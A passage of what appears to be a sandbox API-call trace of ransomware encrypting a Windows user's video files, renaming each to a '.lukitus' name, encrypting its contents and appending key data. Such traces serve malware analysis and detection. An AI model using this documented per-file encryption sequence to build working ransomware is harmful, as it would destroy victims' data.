(in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.164] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\UoYsAzDu.mp4" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\uoysazdu.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.164] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\UoYsAzDu.mp4" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\uoysazdu.mp4"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\F56924BE-9663-41BB-67143CE2-1F8F7E2FED94.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\f56924be-9663-41bb-67143ce2-1f8f7e2fed94.lukitus"), dwFlags=0x9) returned 1 [0109.166] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.166] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.171] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x16734, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x16734, lpOverlapped=0x0) returned 1 [0109.172] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.172] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x16734, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x16734, lpOverlapped=0x0) returned 1 [0109.172] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.172] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x65188790, dwHighDateTime=0x1d31760)) [0109.172] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.173] FlushFileBuffers (hFile=0x328) returned 1 [0109.175] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\W6ZB3DB7-xAUK1zZacTk.flv" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\w6zb3db7-xauk1zzactk.flv"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea76da0, ftCreationTime.dwHighDateTime=0x1d2f8d6, ftLastAccessTime.dwLowDateTime=0x792a6700, ftLastAccessTime.dwHighDateTime=0x1d30269, ftLastWriteTime.dwLowDateTime=0x792a6700, ftLastWriteTime.dwHighDateTime=0x1d30269, nFileSizeHigh=0x0, nFileSizeLow=0x14f93)) returned 1 [0109.175] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.176] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.176] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.176] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.176] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.176] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.176] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.176] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.176] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.176] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.176] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.176] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.176] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.176] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.176] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.176] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.176] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.176] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.176] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.176] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.176] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\W6ZB3DB7-xAUK1zZacTk.flv" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\w6zb3db7-xauk1zzactk.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.176] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\W6ZB3DB7-xAUK1zZacTk.flv" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\w6zb3db7-xauk1zzactk.flv"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\F56924BE-9663-41BB-C97E94D5-143F175BE5A4.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\f56924be-9663-41bb-c97e94d5-143f175be5a4.lukitus"), dwFlags=0x9) returned 1 [0109.177] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.177] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.193] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x14f93, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x14f93, lpOverlapped=0x0) returned 1 [0109.194] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.194] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x14f93, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x14f93, lpOverlapped=0x0) returned 1 [0109.194] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.195] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x651ae8f0, dwHighDateTime=0x1d31760)) [0109.195] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.195] FlushFileBuffers (hFile=0x328) returned 1 [0109.198] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\z AIP.mkv" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\z aip.mkv"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98378330, ftCreationTime.dwHighDateTime=0x1d303c2, ftLastAccessTime.dwLowDateTime=0x170e2090, ftLastAccessTime.dwHighDateTime=0x1d2f664, ftLastWriteTime.dwLowDateTime=0x170e2090, ftLastWriteTime.dwHighDateTime=0x1d2f664, nFileSizeHigh=0x0, nFileSizeLow=0xe854)) returned 1 [0109.198] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.198] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.198] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.198] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.198] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.198] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.198] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.198] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.198] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.198] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.198] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.198] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.198] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.198] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.198] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.198] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.198] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.198] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.198] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.198] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.198] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\z AIP.mkv" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\z aip.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.198] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\z AIP.mkv" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\z aip.mkv"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\4fq0\\F56924BE-9663-41BB-994D93DA-180F73254B26.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\4fq0\\f56924be-9663-41bb-994d93da-180f73254b26.lukitus"), dwFlags=0x9) returned 1 [0109.200] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.200] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.205] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xe854, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xe854, lpOverlapped=0x0) returned 1 [0109.205] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.205] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xe854, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xe854, lpOverlapped=0x0) returned 1 [0109.206] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.206] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x651d4a50, dwHighDateTime=0x1d31760)) [0109.206] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.206] FlushFileBuffers (hFile=0x328) returned 1 [0109.209] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\6PLcPv.avi" (normalized: "c:\\users\\aetadzjz\\videos\\6plcpv.avi"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9578b410, ftCreationTime.dwHighDateTime=0x1d30440, ftLastAccessTime.dwLowDateTime=0xd21a2820, ftLastAccessTime.dwHighDateTime=0x1d2f899, ftLastWriteTime.dwLowDateTime=0xd21a2820, ftLastWriteTime.dwHighDateTime=0x1d2f899, nFileSizeHigh=0x0, nFileSizeLow=0xd378)) returned 1 [0109.209] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.209] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.209] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.209] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.209] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.209] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.209] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.209] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.209] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.209] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.209] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.209] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.209] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.209] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.209] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.209] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.209] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.209] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.209] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.209] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.209] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\6PLcPv.avi" (normalized: "c:\\users\\aetadzjz\\videos\\6plcpv.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.209] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\6PLcPv.avi" (normalized: "c:\\users\\aetadzjz\\videos\\6plcpv.avi"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\F56924BE-9663-41BB-E7CE6B36-6FF2A591CA6B.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\f56924be-9663-41bb-e7ce6b36-6ff2a591ca6b.lukitus"), dwFlags=0x9) returned 1 [0109.211] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.211] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.216] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xd378, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xd378, lpOverlapped=0x0) returned 1 [0109.217] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.217] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xd378, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xd378, lpOverlapped=0x0) returned 1 [0109.217] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.217] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x651fabb0, dwHighDateTime=0x1d31760)) [0109.217] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.217] FlushFileBuffers (hFile=0x328) returned 1 [0109.220] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\7 hNkoOuqhuUPb4WBN\\ryXtE3BJzHtC.mkv" (normalized: "c:\\users\\aetadzjz\\videos\\7 hnkoouqhuupb4wbn\\ryxte3bjzhtc.mkv"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeaa47e50, ftCreationTime.dwHighDateTime=0x1d2fbef, ftLastAccessTime.dwLowDateTime=0x4709c540, ftLastAccessTime.dwHighDateTime=0x1d305f7, ftLastWriteTime.dwLowDateTime=0x4709c540, ftLastWriteTime.dwHighDateTime=0x1d305f7, nFileSizeHigh=0x0, nFileSizeLow=0xec68)) returned 1 [0109.220] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.220] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.220] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.220] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.220] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.220] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.220] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.220] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.220] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.220] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.220] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.220] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.220] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.220] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.220] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.220] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.221] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.221] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.221] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.221] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.221] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\7 hNkoOuqhuUPb4WBN\\ryXtE3BJzHtC.mkv" (normalized: "c:\\users\\aetadzjz\\videos\\7 hnkoouqhuupb4wbn\\ryxte3bjzhtc.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.221] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\7 hNkoOuqhuUPb4WBN\\ryXtE3BJzHtC.mkv" (normalized: "c:\\users\\aetadzjz\\videos\\7 hnkoouqhuupb4wbn\\ryxte3bjzhtc.mkv"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\7 hNkoOuqhuUPb4WBN\\F56924BE-9663-41BB-F403E2BA-F520D5A5373D.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\7 hnkoouqhuupb4wbn\\f56924be-9663-41bb-f403e2ba-f520d5a5373d.lukitus"), dwFlags=0x9) returned 1 [0109.222] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.222] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.227] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xec68, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xec68, lpOverlapped=0x0) returned 1 [0109.229] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.229] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xec68, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xec68, lpOverlapped=0x0) returned 1 [0109.229] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, 